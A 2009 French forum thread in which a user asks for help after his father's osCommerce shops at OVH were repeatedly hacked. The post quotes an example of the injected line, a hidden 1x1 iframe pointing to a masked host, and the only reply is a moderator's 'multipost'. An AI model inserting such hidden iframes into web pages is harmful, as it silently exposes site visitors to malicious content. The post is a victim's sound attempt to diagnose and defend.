Forum |  HardWare.fr | News | Articles | PC | S'identifier | S'inscrire | Shop Recherche
1687 connectés 

  FORUM HardWare.fr
  Windows & Software
  Sécurité

  Victime d'un piratage de Site de Vente en Ligne

 


 Mot :   Pseudo :  
 
Bas de page
Auteur Sujet :

Victime d'un piratage de Site de Vente en Ligne

n°2870399
mayo__
Le père Noël n'existe pas !
Posté le 20-06-2009 à 23:57:50  profilanswer
 

Bonjour amis HFRiens :)

 

Alors voila, j'essaye de vous exposer le soucis le plus précisément et le plus concisément possible :

 
  • Mon père tient une PME dans la connectique, 4 agences, ca tourne bien.
  • Mais modernisme oblige, il a développé un site de vente en ligne, basé sur Oscommerce.
  • Ce site est donc hébergé chez OVH, avec 2 noms de domaines ratachés, un .fr et un .net
  • Depuis peu, il a développé un deuxieme site de vente en ligne, mais cette fois dédié uniquement à la vidéo surveillance.
  • Il l'a hébergé également chez OVH, sur un deuxieme hébergement.
  • Et encore un .fr différent rataché à ce nouveau site.


Donc je récapitule :
- 2 sites distincts sur 2 hébergements distincts. Mais les 2 sites sont composés du même ensemble de scripts php.

 

Depuis début Juin, il est victime d'un piratage.
Dans tous les fichiers comportant "index" dans leur nom, une ligne s'est retrouvé par ci par là, une fois à la ligne 60 une fois à la ligne 20, aléatoirement, comportement les balises HTML <iframe>, quelque chose ressemblant à :

Code :
  1. <iframe src="http://xxxxxxxxxxxx.com/ts/in.cgi?pcc3" width="1" height="1"></iframe>


(ceci est juste à titre d'exemple, je n'ai plus la ligne exacte en mémoire)

 

La conséquence de ces fichiers modifiés rend tout simplement le site non fonctionnel (il n'affiche plus rien à part une ligne d'erreur).

 

Ceci est plutôt TRES ennuyeux pour des professionnels... J'ai tout d'abord conseiller à mon padre de ne plus toucher à son site à partir de son boulot (je ne suis pas confiant de la sécurité locale qu'ils ont) mais d'y toucher que depuis son PC Portable (donc j'ai moi même fait l'installation et la configuration de NOD32, etc). Puis suivant les conseils d'OVH on a changé les mdp et emails de connexion aux FTP et à l'interface OVH.
On est resté 1 semaines tranquille environ (exploit sachant qu'avant ceci, le site était "repiraté" toutes les 12h environ).
Puis là, hier, BIM, les fichiers se sont retrouvés modifiés, avec en plus un _index.html apparu à la racin de /www/  ...
Donc là j'ai tenté de regarder les logs de connexions FTP, j'ai , comme je m'y attendais, trouver différentes adresses IP, jamais la meme, chaque piratage provenait d'une IP différente.
J'ai tout de meme fait un traceroute, je suis tombé un peu partout à la surface du globe, un peu aux USA, un peu en allemagne, un peu en italie... Donc proxy ou ip spoofing là dessous...

 

Je refait un point :

  • Connexion uniquement depuis 1 seul PC sécurisé.
  • Logins et Passwords OVH et FTP modifiés, ainsi qu'adresses e-mail rattachées.
  • 1 semaine sans soucis, puis repiratage.
  • Jamais la meme IP dans les logs FTP.
  • IPs n'aboutissant à rien de concret.


Alors c'est dans le plus grand désarroi que je fais appel à vous...
Dans l'idéal, il faudrait pouvoir localiser la faille, si elle provient du site web, dans les scripts PHP ou Javascript, ou bien s'il s'agit d'un virus ayant infectés les différents PCs... (Sachant qu'a chaque piratage mon pere rechange les logins/MDP/emails...)
Et biensur la corriger.

 


Je remercie mille fois d'avance ceux qui voudront bien m'aider.

 


PS : l'url du site pourrait peut-être utile :D  -> www [dot] derotronic [dot] fr (le site principal, l'autre attendra :p)


Message édité par mayo__ le 21-06-2009 à 00:03:33

---------------
Achats/Ventes / Feedback (+3200 €)
mood
Publicité
Posté le 20-06-2009 à 23:57:50  profilanswer
 

n°2870400
Modération
Posté le 21-06-2009 à 00:35:23  answer
 

multipost


Aller à :
  FORUM HardWare.fr
  Windows & Software
  Sécurité

  Victime d'un piratage de Site de Vente en Ligne

 

Sujets relatifs
Vérifier un éventuel piratage de webcamVerificateur de mise a jour de site
impossible d'acceder à un site internetRedirection d'un site internet vers une autre
Defrag en ligne de commandeExcel : ligne visible et filtre
Ligne de commande pour executer un prog sur un autre compteAspirateur de site
Télécharger toutes les images d'un site à leurs tailles réelles? 
Plus de sujets relatifs à : Victime d'un piratage de Site de Vente en Ligne


Copyright © 1997-2022 Hardware.fr SARL (Signaler un contenu illicite / Données personnelles) / Groupe LDLC / Shop HFR